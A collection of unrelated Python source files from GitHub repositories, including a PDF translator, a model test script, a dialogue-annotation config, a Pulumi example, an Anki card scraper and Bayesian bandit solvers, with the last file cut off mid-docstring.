+{"seq_id":"4805397478","text":"from pypdf import PdfReader\nfrom translate import Translator\ntranslator = Translator(to_lang='pt')\n\nreader = PdfReader(\"In The Night.pdf\")\n\nfor page in reader.pages:\n text = page.extract_text()\n linhas = 
text.splitlines()\n for linha in linhas:\n print(linha)\n traducao = translator.translate(linha)\n print(traducao, '\\n')\n \n \n","repo_name":"juniooor/PDF_Translator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30432597254","text":"import os\nimport sys\nfrom argparse import ArgumentParser\n\nfrom tensorflow.python.keras.models import load_model\n\nfrom util import load_dataset, normalise_data\n\n\ndef parse_arguments():\n parser = ArgumentParser(description='Photomath - test the model',\n epilog='NOTE: Please run scripts/homogenise_data.py first in case dataset is not homogeneous.\\n'\n 'Please run scripts/train.py first in case there is no saved model.')\n\n parser.add_argument('--dataset_path', type=str, default='resources/homogenised_dataset',\n help='path to the homogenised characters dataset')\n\n parser.add_argument('--width', type=int, default=45,\n help='width of the photos in the dataset')\n\n parser.add_argument('--height', type=int, default=45,\n help='height of the photos in the dataset')\n\n parser.add_argument('--model_path', type=str, default='final_model.h5',\n help='path of the trained model')\n\n return parser.parse_args()\n\n\ndef test():\n if not os.path.isdir(args.dataset_path):\n sys.stderr.write('ERROR: Path to the homogenised characters dataset does not exist.\\n')\n exit(0)\n\n # Load dataset\n X_train, y_train, X_test, y_test = load_dataset(args.dataset_path, args.width, args.height)\n\n # Normalise data - scale pixels\n X_train, X_test = normalise_data(X_train), normalise_data(X_test)\n\n # Load the model\n model = load_model(args.model_path)\n\n # Test the model\n _, acc = model.evaluate(X_test, y_test, verbose=0)\n print(f'Accuracy: > %.3f' % (acc * 100.0) + '%')\n\n\nif __name__ == '__main__':\n args = parse_arguments()\n\n if not os.path.isdir(args.dataset_path):\n sys.stderr.write('ERROR: Path to the homogenised characters dataset does not exist.\\n')\n exit(0)\n\n if not os.path.exists(args.model_path):\n sys.stderr.write('ERROR: Path for storing the trained model does not exist.\\n')\n exit(0)\n\n test()\n","repo_name":"sanjadeur/photomath","sub_path":"src/scripts/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6542752814","text":"##############################################\n# IMPORT STATEMENTS\n##############################################\n\n# >>>> Native <<<<\nimport os\nimport sys\nimport json\nimport copy\nfrom json import loads\nfrom typing import Dict, List, Any, Tuple, Hashable, Iterable, Union\nfrom collections import defaultdict\n\n# >>>> Local <<<<\nfrom dummy_models import TypeDummyModel, BeliefStateDummyModel, PolicyDummyModel, SysDummyModel\n\n##############################################\n# CONFIG Dict\n#\n# The config dict describes all the data fields.\n# This is also the place to specify models and label types.\n#\n# Available label types:\n#\n# => \"multilabel_classification\" :: displays as checkboxes in front end\n#\n# => \"multilabel_classification_string\" :: displays as a checkbox and text input for string value. 
Used for\n# slot-value pairs.\n#\n# => \"multilabel_global_string\" :: same as multilabel_classification_string but global for the entire dialogue\n#\n# => \"string\" :: displays underneath the user utterance (indicated by label_type of \"data\")\n#\n#############################################\n\n##############################################\n# CODE\n##############################################\n\n\nclass Configuration(object):\n \"\"\"\n class responsible for configuration and valid annotation structure\n \"\"\"\n\n #importing json configuration file\n try: \n #docker\n with open('configuration/conf.json') as json_file:\n conf = json.load(json_file)\n __DEFAULT_PATH = \"configuration/\"\n except:\n #standalone\n with open('../../configuration/conf.json') as json_file:\n conf = json.load(json_file)\n __DEFAULT_PATH = \"../../configuration/\"\n\n # Here the list of annotation model file names\n annotation_styles = conf[\"app\"][\"annotation_models\"]\n\n # Dict where classifications are stored\n configDict = {}\n\n #accepted metaTags, this list can be customized\n metaTags = [\"collection\",\"status\",\"ID\"]\n\n for model in annotation_styles:\n with open(__DEFAULT_PATH+model) as style_file:\n configDict[model] = json.load(style_file)\n #convert back functions and classes from string \n for key,value in configDict[model].items():\n for sub_key,sub_value in value.items():\n if \"()\" in str(sub_value):\n configDict[model][key][sub_key] = eval(sub_value)\n\n @staticmethod\n def validate_dialogue(annotation_style, dialogue: List[Dict[str, Any]]) -> Union[str, List[Dict]]:\n \"\"\"\n validates the dialogue and makes sure it conforms to the configDict\n \"\"\"\n\n #print(dialogue[0])\n #if dialogue[0][\"collection\"]:\n # search = DatabaseManagement.readDatabase(\"dialogues_collections\", {\"id\":dialogue[0][\"collection\"]}, {\"_id\":0,\"annotationStyle\":1})\n # annotation_style = search[0][\"annotationStyle\"]\n\n try:\n for i, turn in enumerate(dialogue):\n\n for labelName, info in Configuration.configDict[annotation_style].items():\n\n try:\n turn[labelName]\n except KeyError:\n\n # turn 0 stores meta-tags and global slot\n if i == 0:\n continue\n #if (\"multilabel_global_string\" != info[\"label_type\"]):\n # continue\n\n if info[\"required\"]:\n message = (\"ERROR1: Label \\'{}\\' is listed as \\\"required\\\" in the \" \\\n \"config.py file, but is missing from the provided \" \\\n \"dialogue in turn {}.\".format(labelName, i))\n print(message, turn)\n return message\n\n if info[\"required\"] and not turn[labelName]:\n message = (\"ERROR2: Required label, \\'{}\\', does not have a value \" \\\n \"provided in the dialogue in turn {}\".format(labelName, i))\n print(message, turn)\n return message\n\n if info[\"required\"] and (\"multilabel_classification\" == info[\"label_type\"]):\n\n providedLabels = turn[labelName]\n\n if not all(x in info[\"labels\"] for x in providedLabels):\n message = \"ERROR3: One of the provided labels in the list: \" \\\n \"\\'{}\\' is not in allowed list according to \" \\\n \"config.py in turn {}\".format(providedLabels, i)\n print(message, turn)\n return message\n except:\n print(\"dialogue\",i,\"in list couldn't validate with the current annotation style model\")\n return\n\n return dialogue\n\n\n\n @staticmethod\n def create_annotation_dict(annotation_style):\n \"\"\"\n Generates a dictionary mapping label names to a dictionary of their description, label types\n and, if applicable, the possible values the label can take.\n \"\"\"\n out = {}\n\n for 
key,value in Configuration.configDict[annotation_style].items():\n\n temp = list(value[\"labels\"]) if value.get(\"labels\") else \"\"\n\n out[key] = {\n \"label_type\": value[\"label_type\"],\n \"labels\": temp,\n \"info\": value[\"description\"]\n }\n\n return out\n\n\n @staticmethod\n def create_empty_turn():\n \"\"\"\n creates an empty turn based on the configuration dictionary\n \"\"\"\n out = {}\n\n for key,value in Configuration.configDict.items():\n\n labelType = value[\"label_type\"]\n\n if labelType == \"data\":\n out[key] = query\n\n elif labelType == \"multilabel_classification\" or \\\n labelType == \"multilabel_global_string\" or \\\n labelType == \"multilabel_classification_string\":\n\n out[key] = []\n\n elif labelType == \"string\":\n\n out[key] = \"\"\n\n else:\n\n raise ValueError(\"The label type, {}, is not supported\"\n .format(labelType))\n\n return out\n\n\n##############################################\n# FUNCTIONS FOR FINDING THE ERRORS\n##############################################\n\n\ndef agreement_classification(listOfClassifications):\n \"\"\"\n computes, whether there is diagreement, the most likely prediction and confidences of each.\n \"\"\"\n countDict = { \"counts\" : defaultdict(float), \"predictions\" : set()}\n counter = 0\n\n errorFlag = False\n\n for prediction in listOfClassifications:\n\n counter += 1\n\n for label in prediction:\n\n countDict[\"counts\"][label] += 1\n\n if counter > 0:\n\n for key,value in countDict[\"counts\"].items():\n\n temp = value/counter\n\n countDict[\"counts\"][key] = temp\n\n if temp<1:\n\n errorFlag = True\n\n if errorFlag:\n for key,value in countDict[\"counts\"].items():\n\n if value>=0.5:\n\n countDict[\"predictions\"].add(key)\n\n countDict[\"predictions\"] = list( countDict[\"predictions\"] )\n return countDict\n\n else:\n return {}\n\n\n\n\n\ndef agreement_classification_string(listOfClassificationStrings):\n \"\"\"\n computes, whether there is diagreement, the most likely prediction and confidences of each.\n \"\"\"\n countDict = { \"counts\" : defaultdict(float), \"predictions\" : set()}\n\n valueDict = {}\n\n counter = 0\n\n errorFlag = False\n\n for prediction in listOfClassificationStrings:\n\n counter += 1\n\n for label in prediction:\n\n countDict[\"counts\"][label[0]] += 1\n\n temp = valueDict.get(label[0])\n\n if temp:\n if not (temp==label[1]):\n errorFlag = True\n else:\n valueDict[label[0]] = label[1]\n\n if counter > 0:\n\n for key,value in countDict[\"counts\"].items():\n\n temp = value/counter\n\n countDict[\"counts\"][key] = temp\n\n if temp<1:\n\n errorFlag = True\n\n\n if errorFlag:\n for key,value in countDict[\"counts\"].items():\n\n if value>=0.5:\n\n countDict[\"predictions\"].add(key)\n\n countDict[\"predictions\"] = [ (x,y) for x in countDict[\"predictions\"] for z,y in valueDict.items() if z==x]\n\n return countDict\n\n else:\n return {}\n\n\n\n\n\n\n##############################################\n# FUNCTIONS FOR CALCULATING THE SCORES\n##############################################\n\ndef agreement_classification_score(listOfClassifications, totalLabels):\n \"\"\"\n computes, whether there is diagreement, the most likely prediction and confidences of each.\n \"\"\"\n countDict = { \"counts\" : defaultdict(float), \"total\" : 0 , \"errors\":0, \"annotatedBy\" : 0, \"alpha\" : 0.0 , \"kappa\" : 0.0, \"accuracy\" : 0 }\n counter = 0\n\n #getting raw counts\n for prediction in listOfClassifications:\n\n counter += 1\n\n for label in prediction:\n\n countDict[\"counts\"][label] += 1\n\n 
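# --- Aside: the agreement helpers in this module all follow one recipe: tally
# each label over the annotators, convert tallies to per-label confidences,
# treat any confidence below 1.0 as disagreement, and keep labels with at least
# 0.5 support as the majority prediction. A standalone sketch of that recipe
# (a plain function for illustration, not this module's exact API):
from collections import defaultdict

def label_agreement(annotations):
    # annotations: one list of labels per annotator.
    counts = defaultdict(float)
    for labels in annotations:
        for label in labels:
            counts[label] += 1
    n = len(annotations)
    confidences = {label: c / n for label, c in counts.items()}
    if all(conf == 1.0 for conf in confidences.values()):
        return {}                          # full agreement: nothing to flag
    majority = [l for l, conf in confidences.items() if conf >= 0.5]
    return {"counts": confidences, "predictions": majority}

# Three annotators; only two of them tagged "inform".
print(label_agreement([["greet", "inform"], ["greet", "inform"], ["greet"]]))
# {'counts': {'greet': 1.0, 'inform': 0.666...}, 'predictions': ['greet', 'inform']}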
countDict[\"annotatedBy\"] = counter\n\n #getting error, `alpha` and `kappa` -> slightly modified version of Fleiss Kappa & Krippendorff Alpha\n errorCount = 0\n totalLabel = 0\n for label, count in countDict[\"counts\"].items():\n\n totalLabel += 1\n\n if counter > count:\n\n errorCount += 1\n\n countDict[\"errors\"] = errorCount\n countDict[\"total\"] = totalLabel\n\n\n #kappa is calculated with uniform random probabilty for the chance\n A0 = (1 / (totalLabels * totalLabels ) )\n Ae = errorCount / totalLabels\n countDict[\"kappa\"] = (Ae-A0) / (1-A0)\n\n\n #A02\n countDict[\"accuracy\"] = errorCount/totalLabels\n\n return countDict\n\n\n\n##############################################\n# API to the outside world\n##############################################\n\nagreementConfig = {\n \"data\" : None,\n \"string\" : None,\n \"multilabel_classification\" : agreement_classification,\n \"multilabel_classification_string\" : agreement_classification_string,\n \"multilabel_global_string\" : agreement_classification_string\n}\n\nagreementScoreConfig = {\n \"data\" : None,\n \"string\" : None,\n \"multilabel_classification\" : agreement_classification_score,\n \"multilabel_classification_string\" : None,\n \"multilabel_global_string\" : None\n}\n","repo_name":"Wluper/matilda","sub_path":"web/server/annotator_config.py","file_name":"annotator_config.py","file_ext":"py","file_size_in_byte":10653,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"21"} +{"seq_id":"16712951484","text":"\"\"\"A Python Pulumi program\"\"\"\n\nimport zscaler_pulumi_zia as zia\n\nstaticIP = zia.ZIATrafficForwardingStaticIP(\"static-ip-example\",\n comment = \"Pulumi Static IP\",\n ip_address = \"121.234.54.105\",\n geo_override = True,\n\tlatitude = -36.848461,\n longitude = 174.763336,\n routable_ip = True,\n)","repo_name":"susanev/pulumi-zia","sub_path":"examples/python/zia_traffic_forwarding_static_ip/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43153873387","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\ndef fetch_html(word: str) -> str:\n \"\"\"获取单词的整个 HTML 页面。\"\"\"\n url = \"https://www.youdao.com/result?word=\" + word + \"&lang=en\"\n response = requests.get(url)\n html = response.text\n return html\n\n\ndef extract_phonogram(html: str) -> str:\n \"\"\"从 HTML 页面中提取音标。\"\"\"\n soup = BeautifulSoup(html, \"html.parser\")\n\n def extract_original(phone_div):\n # 提取原式的音标字符串。\n phone = phone_div.find(\"span\", class_=\"phonetic\").text.strip(\" /\")\n\n # 将音标的斜线替换为中括号。\n return f\"[{phone.replace('/', '[').replace(' ', ']').replace('[', ' [')}]\"\n\n phone_divs = soup.find_all(\"div\", class_=\"per-phone\")\n eng_phone = extract_original(phone_divs[0])\n ame_phone = extract_original(\n phone_divs[1] if len(phone_divs) > 1 else phone_divs[0]\n )\n return f\"英 {eng_phone} 美 {ame_phone}\"\n\n\ndef extract_chinese(html: str) -> str:\n \"\"\"从 HTML 页面中提取中文释义。\"\"\"\n soup = BeautifulSoup(html, \"html.parser\")\n\n # 按词性分类的中文释义。\n chinese_meanings = soup.find_all(\"li\", class_=\"word-exp\")\n\n # 遍历每个词性。\n ret_list = []\n for meaning in chinese_meanings:\n pos = meaning.find(\"span\", class_=\"pos\")\n # 跳过人名。\n if pos is None:\n continue\n pos = pos.text.strip()\n trans = meaning.find(\"span\", class_=\"trans\").text.strip()\n\n my_class_map = {\n \"n.\": \"pos_n\",\n \"v.\": \"pos_v\",\n \"vi.\": \"pos_v\",\n \"vt.\": 
\"pos_v\",\n \"adj.\": \"pos_a\",\n }\n my_class = my_class_map.get(pos, \"pos_r\")\n ret_list.append(f'{pos}{trans}')\n\n return \"
\".join(ret_list)\n\n\ndef make_line(word: str) -> str:\n \"\"\"将单词转换为最终的行。\"\"\"\n html = fetch_html(word)\n phonogram = extract_phonogram(html)\n chinese = extract_chinese(html)\n return f\"{word}\\t{phonogram}\\t{chinese}\\t[sound:{word}.mp3]\"\n\n\ndef make_all_lines(words: list) -> str:\n \"\"\"将单词列表转换为可导入 Anki 的纯文本。\"\"\"\n ret = \"\"\n ret += \"# 由 UnnamedOrange 的制卡工具生成。\\n\"\n ret += \"# (1)英语单词\\t(2)英美音标\\t(3)中文释义\\t(4)英语发音\\n\"\n\n success = 0\n for word in words:\n try:\n ret += make_line(word) + \"\\n\"\n success += 1\n except Exception as e:\n print(f\"制卡 {word} 时出错:{e}\")\n\n print(f\"成功制卡 {success} 张,失败 {len(words) - success} 张。\")\n\n return ret\n\n\ndef main():\n print(\"请输入单词,一行一个,以空行结束:\")\n words = []\n while True:\n word = input()\n if word == \"\":\n break\n words.append(word)\n\n with open(\"Anki.txt\", \"w\", encoding=\"utf-8\") as f:\n f.write(make_all_lines(words))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"UnnamedOrange/Anki-Cards","sub_path":"English/scripts/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10835675388","text":"from typing import List\nimport numpy as np\nfrom Classes_RL.Utilities import Utilities\nfrom Classes_RL.Bandit import Bandit\nfrom Classes_RL.Interfaces import Solver\nfrom Classes_RL.Results_solver import ResultsSolver\n\nclass Sliding(Solver):\n\n mu_bar: np.ndarray\n tau_bar: np.ndarray\n var_bar: np.ndarray\n window: int\n optimistic_Q: float\n var_0: float\n results_solver: ResultsSolver\n n: int\n N: np.ndarray\n P: np.ndarray\n\n def __init__(self, bandits: List[Bandit], oracle_data, n_iteration, n_episode):\n\n self.bandits = bandits\n self.oracle_data = oracle_data\n\n self.a = len(self.bandits)\n self.A = np.arange(self.a)\n\n self.n_iteration = n_iteration\n self.n_episode = n_episode\n self.n_action = len(bandits)\n\n self.results_solver = ResultsSolver(bandits, n_iteration, n_episode)\n\n def run(self):\n\n self.reset()\n self.results_solver.start()\n\n for i in range(self.n_episode):\n\n self.episode = i\n\n for k in range(self.n_iteration):\n\n self.iteration = k\n\n a, r = self.pull(k=k)\n\n # self.results_solver.P_cum[i, k] = self.N / self.n\n # self.results_solver.P[i, k] = Utilities.softmax_temperature(self.Q)\n\n self.results_solver.P_action[i, k] = self.N / self.n\n self.results_solver.P[i, k] = self.P\n\n self.results_solver.reward[i, k] = r\n self.results_solver.regret[i, k] = self.oracle_data[\"max_reward\"][k] - r\n self.results_solver.action[i, k] = a\n\n self.results_solver.Q[i, k] = self.mu_bar\n self.results_solver.Q_mean[i, k] = self.Q_mean\n self.results_solver.Q_mean_weighted[i, k] = np.average(self.results_solver.Q[i, k], weights=self.P)\n\n\n # just idea\n self.results_solver.regret_a[i, k] = np.mean((self.oracle_data[\"mu_known\"][k] - self.mu_bar) ** 2)\n\n # Error\n self.results_solver.cross_entropy[i, k] = Utilities.cross_entropy(p=self.oracle_data[\"P_action\"][k], q=self.results_solver.P_action[i, k])\n self.results_solver.ae[i, k] = np.abs(self.oracle_data[\"Q_mean_weighted\"][k] - self.results_solver.Q_mean_weighted[i, k])\n\n self.results_solver.mu_bar[i, k] = self.mu_bar\n self.results_solver.tau_bar[i, k] = self.tau_bar\n self.results_solver.var_bar[i, k] = self.var_bar\n\n self.results_solver.action_total[i] = self.N\n self.results_solver.cum_reward[i] = np.cumsum(self.results_solver.reward[i, :])\n self.results_solver.cum_regret[i] = 
np.cumsum(self.results_solver.regret[i, :])\n self.results_solver.cum_cross_entropy[i] = np.cumsum(self.results_solver.cross_entropy[i, :])\n self.results_solver.cum_ae[i] = np.cumsum(self.results_solver.ae[i, :])\n\n # just idea\n self.results_solver.cum_regret_a[i] = np.cumsum(self.results_solver.regret_a[i, :])\n\n self.reset()\n\n results, results_mean = self.results_solver.end()\n\n return results, results_mean\n\n def pull(self, k):\n\n # Select action\n a = self.select_action()\n\n # Get the reward for the current action and best action\n r = self.bandits[a].get_reward(iteration=self.n)\n\n # Update action count\n self.n += 1\n self.N[a] += 1\n\n # Update Q\n self.update_Q(a=a, r=r)\n\n return a, r\n\n def reset(self):\n\n self.n = 0 # Number of total step\n self.N = np.zeros(self.n_action) # Number of step for each action\n\n # Q-value\n self.Q_mean = 0\n\n # Bayesian stuff\n self.mu_bar = np.zeros(shape=self.a) + self.optimistic_Q\n self.var_bar = np.ones(shape=self.a) * self.var_0 # initial variance\n self.tau_bar = np.ones(shape=self.a) * 1. / self.var_bar # the posterior precision\n\nclass BayesianSlidingWindowUMKV(Sliding):\n\n hyperparameters: dict\n solver_name: str\n is_stationary: bool\n t = int\n optimistic_Q: int\n window: int\n var_bar_known: list\n\n def set_hyperparameters(self, hyperparameters):\n\n self.hyperparameters = hyperparameters\n self.solver_name = hyperparameters[\"solver_name\"]\n self.t = hyperparameters[\"temperature\"]\n self.optimistic_Q = hyperparameters[\"optimistic_Q\"]\n self.window = hyperparameters[\"window\"]\n self.var_0 = hyperparameters[\"initial_var\"]\n\n def update_Q(self, a, r):\n\n ''' increase the number of times this socket has been used and improve the estimate of the\n value (the mean) by combining the new value 'x' with the current mean '''\n\n # Update Bayesian model\n if self.iteration < self.window:\n\n # Update the mean of the posterior\n numerator = (self.tau_bar[a] * self.mu_bar[a]) + (self.N[a] * r)\n denominator = self.tau_bar[a] + self.N[a]\n self.mu_bar[a] = numerator / denominator\n\n # Increase the sum the precision\n tau = 1 # Considering the same precision in the data\n self.tau_bar[a] = self.N[a] * tau\n self.var_bar[a] = 1 / self.tau_bar[a] # Variance based on the precision (Variance for the sampling\n self.Q_mean = self.Q_mean + (1 / self.n) * (r - self.Q_mean)\n\n else: # Specific for the past n observation\n\n # Reset observation and set the first values as the values already in mu as the first values\n mu = self.results_solver.mu_bar[self.episode, self.iteration - self.window, :].copy()\n Q_mean_w = self.results_solver.Q_mean[self.episode, self.iteration - self.window].copy()\n # mu = np.zeros(self.n_action) + self.optimistic_Q\n self.tau_bar = np.ones(shape=self.a) * 1 / self.var_0\n self.var_bar = np.ones(shape=self.a) * 1. 
/ self.tau_bar\n self.n_w = 0.\n self.N_w = np.zeros(self.a)\n\n for w in range(self.iteration - self.window + 1, self.iteration):\n\n # Get past action and reward\n a_w = int(self.results_solver.action[self.episode, w])\n r_w = self.results_solver.reward[self.episode, w]\n\n # Update action count\n self.N_w[a_w] += 1\n self.n_w += 1\n\n # Update the mean of the posterior\n numerator = (self.tau_bar[a_w] * mu[a_w]) + (self.N_w[a_w] * r_w)\n denominator = self.tau_bar[a_w] + self.N_w[a_w]\n mu[a_w] = numerator / denominator\n\n # Increase the sum the precision\n tau = 1 # Considering the same precision in the data\n self.tau_bar[a_w] = self.N_w[a_w] * tau\n self.var_bar[a_w] = 1 / self.tau_bar[a_w] # Variance based on the precision (Variance for the sampling\n\n Q_mean_w = Q_mean_w + (1. / self.n_w) * (r_w - Q_mean_w)\n\n self.N_w[a] += 1\n self.n_w += 1\n self.mu_bar = mu\n self.Q_mean = Q_mean_w + (1. / self.n_w) * (r - Q_mean_w)\n\n # Update the mean of the posterior\n numerator = (self.tau_bar[a] * self.mu_bar[a]) + (self.N[a] * r)\n denominator = self.tau_bar[a] + self.N[a]\n self.mu_bar[a] = numerator / denominator\n\n # Increase the sum the precision\n tau = 1 # Considering the same precision in the data\n self.tau_bar[a] = self.N[a] * tau\n self.var_bar[a] = 1 / self.tau_bar[a]\n\n def select_action(self):\n\n values = []\n\n for i in range(self.a):\n temp = np.random.normal(self.mu_bar[i], np.sqrt(1 / self.tau_bar[i])) # use precision for sampling (Bad for static behavior since the variance become smaller, smaller ....)\n if temp < 0: # We want positive value only\n temp = 0\n values.append(temp)\n values = np.array(values)\n values = np.nan_to_num(values, neginf=0.00001, posinf=0.00001, nan=0.00001)\n\n self.P = Utilities.softmax_temperature(x=values, t=self.t)\n a = np.random.choice(self.A, p=self.P)\n\n return a\n\nclass BayesianSlidingWindowUMUV(Sliding):\n\n hyperparameters: dict\n solver_name: str\n is_stationary: bool\n t = int\n optimistic_Q: int\n window: int\n var_bar_known: list\n\n def set_hyperparameters(self, hyperparameters):\n\n self.hyperparameters = hyperparameters\n self.solver_name = hyperparameters[\"solver_name\"]\n self.t = hyperparameters[\"temperature\"]\n self.optimistic_Q = hyperparameters[\"optimistic_Q\"]\n self.window = hyperparameters[\"window\"]\n self.var_0 = hyperparameters[\"initial_var\"]\n\n # Gaussian part for unknown mean and unknown variance (normal - gamma)\n self.alpha = np.ones(shape=self.a) * hyperparameters[\"alpha_g\"] # gamma shape parameter\n self.beta = np.ones(shape=self.a) * hyperparameters[\"beta_g\"] # gamma rate parameter\n\n self.alpha_g = np.ones(shape=self.a) * hyperparameters[\"alpha_g\"]\n self.beta_g = np.ones(shape=self.a) * hyperparameters[\"beta_g\"]\n\n def update_Q(self, a, r):\n\n ''' increase the number of times this socket has been used and improve the estimate of the\n value (the mean) by combining the new value 'x' with the current mean '''\n\n self.Q_mean = self.Q_mean + (1 / self.window) * (r - self.Q_mean)\n\n v = self.N[a]\n n = 1\n\n if self.iteration < self.window:\n\n # Update the mean of the posterior\n\n self.alpha[a] = self.alpha[a] + n / 2\n\n numerator = n * v * (r - self.mu_bar[a]) ** 2\n denominator = (v + n) * 2\n\n self.beta[a] = self.beta[a] + numerator / denominator\n\n # # estimate the variance - calculate the mean from the gamma\n # self.var[a] = self.beta[a] / (self.alpha[a] * v)\n # self.tau[a] = 1 / self.var[a]\n\n numerator_mu = v * self.mu_bar[a] + n * r\n denominator_mu = v + n\n 
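# --- Aside: both sliding-window solvers lean on the same conjugate-Gaussian
# identity -- with known observation precision, the posterior mean is the
# precision-weighted blend (tau * mu + n * r) / (tau + n) -- and they pick
# actions by Thompson sampling from each arm's posterior. A compressed
# standalone sketch of that loop (two arms with made-up payoffs; none of the
# class's windowing or bookkeeping):
import numpy as np

rng = np.random.default_rng(0)
true_means = np.array([1.0, 2.0])     # hypothetical arm payoffs
mu = np.zeros(2)                      # posterior means
tau = np.full(2, 1e-3)                # posterior precisions (near-flat prior)

for step in range(500):
    # Thompson sampling: one posterior draw per arm, act greedily on the draws.
    samples = rng.normal(mu, np.sqrt(1.0 / tau))
    a = int(np.argmax(samples))
    r = rng.normal(true_means[a], 1.0)             # unit observation precision
    mu[a] = (tau[a] * mu[a] + r) / (tau[a] + 1.0)  # conjugate mean update, n = 1
    tau[a] += 1.0                                  # precision accumulates per pull

print(np.round(mu, 2))                # posterior means approach the true payoffs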
self.mu_bar[a] = numerator_mu / denominator_mu\n\n # Recompute from the past n observations only\n else:\n\n # Reset the statistics, seeding mu with the values recorded at the start of the window\n mu = self.results_solver.mu_bar[self.episode, self.iteration - self.window, :].copy()\n Q_mean_w = self.results_solver.Q_mean[self.episode, self.iteration - self.window].copy()\n # mu = np.zeros(self.n_action) + self.optimistic_Q\n self.alpha = self.alpha_g.copy()\n self.beta = self.beta_g.copy()\n self.n_w = 0.\n self.N_w = np.zeros(self.a)\n\n for w in range(self.iteration - self.window + 1, self.iteration):\n\n # Get past action and reward\n a_w = int(self.results_solver.action[self.episode, w])\n r_w = self.results_solver.reward[self.episode, w]\n\n # Update action count\n self.N_w[a_w] += 1\n self.n_w += 1\n v = self.N_w[a_w]\n\n self.alpha[a_w] = self.alpha[a_w] + n / 2\n\n numerator = n * v * (r_w - mu[a_w]) ** 2\n denominator = (v + n) * 2\n\n self.beta[a_w] = self.beta[a_w] + numerator / denominator\n\n # estimate the variance - calculate the mean from the gamma\n # self.var[a_w] = self.beta[a_w] / (self.alpha[a_w] * v)\n # self.tau[a_w] = 1 / self.var[a_w]\n\n numerator_mu = v * mu[a_w] + n * r_w\n denominator_mu = v + n\n mu[a_w] = numerator_mu / denominator_mu\n\n Q_mean_w = Q_mean_w + (1. / self.n_w) * (r_w - Q_mean_w)\n\n self.N_w[a] += 1\n self.n_w += 1\n self.mu_bar = mu\n self.Q_mean = Q_mean_w + (1. / self.n_w) * (r - Q_mean_w)\n\n # Update the mean of the posterior\n\n self.alpha[a] = self.alpha[a] + n / 2\n\n numerator = n * v * (r - self.mu_bar[a]) ** 2\n denominator = (v + n) * 2\n\n self.beta[a] = self.beta[a] + numerator / denominator\n\n numerator_mu = v * self.mu_bar[a] + n * r\n denominator_mu = v + n\n self.mu_bar[a] = numerator_mu / denominator_mu\n\n def select_action(self):\n\n values = []\n\n for i in range(self.a):\n\n precision = np.random.gamma(self.alpha[i], 1 / self.beta[i]) # numpy's second argument is the scale = 1/rate (beta is the rate)\n\n if precision == 0 or self.n == 0:\n precision = 0.001\n\n # estimate the variance - calculate the mean from the gamma\n self.tau_bar[i] = precision\n self.var_bar[i] = 1 / precision\n\n temp = np.random.normal(self.mu_bar[i], np.sqrt(1 / precision))\n\n if temp < 0: # We want positive values only\n temp = 0\n\n values.append(temp)\n\n values = np.array(values)\n values = np.nan_to_num(values, neginf=0.00001, posinf=0.00001, nan=0.00001)\n\n self.P = Utilities.softmax_temperature(x=values, t=self.t) # Could be tuned to allow more exploration\n a = np.random.choice(self.A, p=self.P)\n\n return a","repo_name":"KentaKamikokuryo/Bandits_AAE_Handrecognition","sub_path":"Python/Classes_RL/Bayesian_sliding_solver.py","file_name":"Bayesian_sliding_solver.py","file_ext":"py","file_size_in_byte":13303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"73233854451","text":"def location_Player(keyinput, board):\n dic = {\n \"left\" : (-1,0),\n \"up\" : (0,1),\n \"down\" : (0,-1),\n \"right\" : (1,0),\n }\n x,y = 0,0\n lr, ud = board\n lr//=2\n ud//=2\n for key in keyinput:\n dx,dy = dic[key]\n x += dx\n y += dy\n x=max(-lr,x)\n y = max(-ud,y)\n x = min(lr,x)\n y = min(ud,y)\n answer = [x,y]\n return answer","repo_name":"YH-LEE21/Python_Programmers","sub_path":"Level_0/캐릭터의 좌표/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"72501649012","text":"import numpy as np\nfrom 
sklearn.utils.extmath import safe_sparse_dot as safedot\nfrom ..Utilities.utils import Kernel\n\n# import os\n# print(os.getcwd())\n# import sys\n# sys.exit(1)\n\nclass NearestNeighbors():\n \"\"\"\n This class implements the k-nearest neighbors algorithm using\n both kernelized and standard distance metrics\n \"\"\"\n\n\n def l1_distance(self, X, x):\n \"\"\"\n Computes the Manhattan distance between a single feature observation from testing\n data and each observation from training data\n\n Parameters\n ----------\n X : N x D matrix consisting of N observations of data\n x : D x 1 vector consisting of a single observation\n\n Returns\n -------\n N x 1 vector of distances between x and each observation in X\n \"\"\"\n\n raw_dist = np.abs(X - x)\n return np.sum(raw_dist, axis = 1)\n\n\n def l2_distance(self, X, x, gen_dist, kernel, **kwargs):\n \"\"\"\n Computes Euclidean distance between a single feature observation from testing\n data and each observation from training data\n\n Parameters\n ----------\n X : N x D matrix consisting of N observations of data\n x : D x 1 vector consisting of a single observation\n gen_dist : pre computed squared norm of each row vector in X\n kernel : function that will apply a pseudo projection of the features into a space\n of different dimensions\n\n Returns\n -------\n N x 1 vector of distances between x and each observation in X\n \"\"\"\n\n if kernel is None:\n t_1 = gen_dist\n t_2 = safedot(x, x)\n t_3 = 2 * safedot(X, x)\n return t_1 + t_2 - t_3\n else:\n distances = np.zeros(X.shape[0])\n for i in range(X.shape[0]):\n t_2 = kernel(x, x, **kwargs)\n t_3 = kernel(X[i], x, **kwargs)\n distances[i] = gen_dist[i] + t_2 - (2 * t_3)\n return distances\n\n\n def lp_distance(self, X, x, p = 3):\n \"\"\"\n Computes the Minkowski distance between a single feature observation from testing\n data and each observation from training data\n\n Parameters\n ----------\n X : N x D matrix consisting of N observations of data\n x : D x 1 vector consisting of a single observation\n\n Returns\n -------\n N x 1 vector of distances between x and each observation in X\n 